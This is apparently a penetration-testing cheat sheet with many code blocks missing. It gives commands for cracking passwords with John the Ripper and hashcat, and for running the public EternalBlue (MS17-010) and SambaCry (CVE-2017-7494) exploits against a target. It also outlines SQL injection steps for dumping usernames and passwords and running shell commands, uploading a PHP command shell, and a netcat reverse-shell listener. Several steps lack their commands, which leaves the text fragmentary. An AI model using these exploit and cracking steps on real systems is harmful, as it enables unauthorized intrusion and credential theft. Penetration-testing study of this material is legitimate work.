unshadow passwd.txt shadow.txt > unshadow.txt
john unshadow.txt --wordlist=/usr/share/wordlists/rockyou.txt
Password-protected RAR files.
Hashcat
Modes
SHA256: 1400
SHA512: 1800
RAR5: 13000
Attacks
Dictionary: 0
Local File Inclusions
Find a way to upload a PHP command shell.
MS09-050
CVE-2009-3103: SMBv2 Command Value Vulnerability
This vulnerability impacts Windows Server 2008 SP1 32-bit as well as Windows Vista SP1/SP2 and Windows 7.
EternalBlue
CVE-2017-0144
This vulnerability impacts Windows. Exploiting it requires access to a Named Pipe (NOTE: Windows Vista and newer does not allow anonymous access to Named Pipes).
SambaCry
CVE-2017-7494
Exploiting this vulnerability depends on your ability to write to a share. Download Proof-of-Concept code from joxeankoret and modify as desired.
An example of a modified implant.c file. This source file gets compiled by the provided Python script.
My example payload sends two ICMP packets to my computer. Therefore, the command sentence below is necessary to confirm the exploit works. If you chose to include a reverse shell, you would run something like sudo nc -nvlp 443 instead.
Run the exploit.
ShellShock via SMTP
CVE-2014-6271
Shell via Samba Logon Command
SQL Injection
Check for a SQLi vulnerability
Check the quality of SQLi vulnerability
Get the number of columns of a table (increment the number until there is an error; ex: if 4 triggers an error, there are 3 columns).
Get all table names (look for user/admin tables).
Get all possible column names within the entire database (look for values like "username" and "password").
Get usernames and passwords from the users table.
Get usernames and passwords from the admins table.
Get the database software version.
Get the database service account name.
Execute a database function (ex: user(), database(), etc.).
Execute shell command (ex: find current working directory).
Common Oracle-based SQL Query Errors
ID
Error
Explanation
ORA-00923
FROM keyword not found where expected
Occurs when you try to execute a SELECT or REVOKE statement without a FROM keyword in its correct form and place. If you are seeing this error, the keyword FROM is spelled incorrectly, misplaced, or altogether missing. In Oracle, the keyword FROM must follow the last selected item in a SELECT statement or in the case of a REVOKE statement, the privileges. If the FROM keyword is missing or otherwise incorrect, you will see ORA-00923.
ORA-00933
SQL command not properly ended
The SQL statement ends with an inappropriate clause. Correct the syntax by removing the inappropriate clauses.
ORA-00936
Missing expression
You left out an important chunk of what you were trying to run. This can happen fairly easily, but provided below are two examples that are the most common occurrence of this issue.The first example is the product of missing information in a SELECT statement. The second is when the FROM clause within the statement is omitted.
ORA-01785
ORDER BY item must be the number of a SELECT-list expression
ORA-01789
Query block has incorrect number of result columns
ORA-01790
Expression must have same datatype as corresponding expression
Re-write the SELECT statement so that each matching column is the same data type. Try replacing the columns with null. For example, if you only want to see the table_name and the output is 3 columns, use "table_name,null,null" not "table_name,2,3".
git clone https://github.com/worawit/MS17-010
cd MS17-010
pip install impacket # mysmb.py ships with this exploit. offsec also hosts it on their GitHub
python checker.py $TARGET # check if target is vulnerable and find an accessible Named Pipe
python zzz_exploit.py $TARGET $NAMED_PIPE
mkdir exploits
cd exploits
git clone https://github.com/joxeankoret/CVE-2017-7494.git
cd CVE-2017-7494
mv implant.c implant.bak
vim implant.c